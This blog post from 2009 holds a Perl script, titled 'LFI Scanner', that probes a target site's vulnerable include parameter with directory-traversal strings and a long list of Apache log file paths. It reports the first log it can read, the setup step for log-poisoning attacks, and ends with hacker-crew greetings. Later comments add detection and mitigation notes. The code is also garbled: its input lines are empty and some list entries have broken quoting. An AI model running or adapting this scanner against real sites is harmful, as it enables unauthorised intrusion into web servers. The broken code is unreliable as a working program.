
Friday, July 3, 2009

LFI Scanner

use LWP::UserAgent;
use HTTP::Request;

# Build the single HTTP client that every later request goes through; the script
# dies with the message 'Error' if the constructor returns a false value.
$t = LWP::UserAgent->new() or die ('Error');
# Every request carries the fixed User-Agent string "Mozilla". Because the value is
# constant and unusually short, it is a convenient field to filter on when reviewing
# web-server access logs for traffic produced by this script.
$t->agent('Mozilla');

# Interactive prompts. The prompt text is Indonesian ("Masukkan" = "Enter"): target
# host, the path and parameter that receive the include value, the traversal prefix,
# and an option number.
# NOTE(review): as posted, the right-hand side of each chomp() assignment below is
# empty, so these lines are not valid Perl; the input expression appears to have been
# lost when the page was extracted.
print "[~] LFI Scanner \n";
print "[~] Masukkan Site (ex: www.site.com) : ";
chomp($site = );
print "[~] Masukkan Path (ex: /file.php?lfi=) : ";
chomp($path = );
print "[~] Masukkan LFI Vuln (ex: ../../../) : ";
chomp($lfi = );
# The option prompt describes choice 1 as "null" and leaves choice 2 blank.
print "[~] Options : 1 = null 2 = : ";
chomp($opts = );

# Candidate file paths; the scan loop appends each one to the user-supplied URL
# prefix and sends one request per entry.
# Every entry names a web-server access or error log (apache, apache2, httpd, lampp
# and xampp directory layouts, plus one "Program Files\Apache Group" layout), written
# bare, absolute, or behind runs of "../".
# Defender's view: a burst of GET requests from one client whose query string holds
# "../" sequences followed by these log file names is a recognisable signature of
# include-path probing and is worth alerting on in access-log or WAF rules.
# NOTE(review): many entries are exact duplicates of each other, and the list does
# not parse as posted because two entries have damaged quoting.
@list = (
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"var/log/httpd/access_log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"var/log/httpd/error_log",
"apache/logs/error.log",
"apache/logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"logs/error.log",
"logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/error_log",
"etc/httpd/logs/error.log",
".. /var/www/logs/access_log",
"/var/www/logs/access_log",
"var/www/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/access.log",
"var/log/apache/access_log",
"var/log/apache/access.log",
"var/log/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"usr/local/apache/logs/error_log",
"usr/local/apache/logs/error.log",
"var/log/apache/error_log",
"var/log/apache/error.log",
"var/log/access_log",
"var/log/error_log",
"/apache/logs/error.log",
"/apache/logs/access.log",
"apache/logs/error.log",
"apache/logs/access.log",
"/apache/logs/error.log",
"/apache/logs/access.log",
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/etc/httpd/logs/error_log",
"/etc/httpd/logs/error.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache2/access_log",
"/var/log/apache/access.log",
"/var/log/apache2/access.log",
"/var/log/access_log",
"/var/log/access.log",
"/var/www/logs/error_log",
"/var/www/logs/error.log",
"/usr/local/apache/logs/error_log",
"/usr/local/apache/logs/error.log",
"/var/log/apache/error_log",
"/var/log/apache2/error_log",
"/var/log/apache/error.log",
"/var/log/apache2/error.log",
"/var/log/error_log",
"/var/log/error.log",
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/error_log",
"../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../var/log/httpd/error_log,"
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../apache2/logs/error.log",
"../apache2/logs/access.log",
"../../apache2/logs/error.log",
"../../apache2/logs/access.log",
"../../../apache2/logs/error.log",
"../../../apache2/logs/access.log",
"../../../../apache2/logs/error.log",
"../../../../apache2/logs/access.log",
"../../../../../apache2/logs/error.log",
"../../../../../apache2/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../usr/local/apache2/logs/access_log",
"../../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../usr/local/apache2/logs/error_log",
"../../../../../../../../../../usr/local/apache2/logs/error.log",
"../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../var/log/httpd/access_log",
""../../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../var/log/httpd/error_log",
"../../../../../../../../../../var/log/httpd/error.log",
"../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../var/log/apache2/access_log",
"../../../../../../../../../../var/log/apache2/access.log",
"../../../../../../../../../../var/log/apache2/error_log",
"../../../../../../../../../../var/log/apache2/error.log",
"../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../var/log/access.log",
"../../../../../../../../../../var/log/error_log",
"../../../../../../../../../../var/log/error.log",
"../../../../../../../../../../opt/lampp/logs/access_log",
"../../../../../../../../../../opt/lampp/logs/error_log",
"../../../../../../../../../../opt/xampp/logs/access_log",
"../../../../../../../../../../opt/xampp/logs/error_log",
"../../../../../../../../../../opt/lampp/logs/access.log",
"../../../../../../../../../../opt/lampp/logs/error.log",
"../../../../../../../../../../opt/xampp/logs/access.log",
"../../../../../../../../../../opt/xampp/logs/error.log",
"../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log",
"../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/error.log",
"../../../../../../../../apache/logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/log/error_log"
);

# Main flow: with no option entered, print a reminder ("Enter Options") and exit;
# otherwise request each candidate path in turn and stop at the first response that
# looks like an included access log.
#
# Defender's note: what this loop probes for is a page that passes a request
# parameter into a file-include call. The durable fix is in the application (map the
# parameter to a fixed allow-list of files rather than using it as a path). As defence
# in depth, keep the web-server account from reading its own log files and restrict
# PHP's reachable paths (for example with open_basedir).
if (!$opts)
{
print "[~] Masukkan Options\n";
exit;
}
else
{
print "\nScanning...\n";
foreach $lo (@list)
{
# NOTE(review): both branches build exactly the same URL, so as posted the option
# value does not change the request at all.
if ($opts == '1')
{
$attack = "http://$site/$path$lfi$lo";
}
else
{
$attack = "http://$site/$path$lfi$lo";
}

# One plain-HTTP GET per candidate, sent through the shared user agent.
$r = $t->request(HTTP::Request->new(GET=>$attack));
# Success heuristic: the response body contains the text 'GET /' (presumably because
# access logs record request lines of that form). Any page that happens to print that
# text matches as well, so a hit is not proof of inclusion.
$test = 'GET /';
if ($r->content =~/$test/)
{
print "[~] Found Logs File : $attack\n";
# Stops the whole program at the first match; later candidates are never requested.
exit;
}
else
{
print "[~] Trying...\n";
}
}
}
# Reached only when the loop finished without a match, since both the missing-option
# branch and a hit call exit.
print "[~] Done\n";


--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
y3dips
K-159
bius
lirva32

And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)

MAAF ATAS SEMUA DOSA DAN SALAHKU

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ jatimcrew staff
~ boys_rvn1609, arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, jaqk
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding
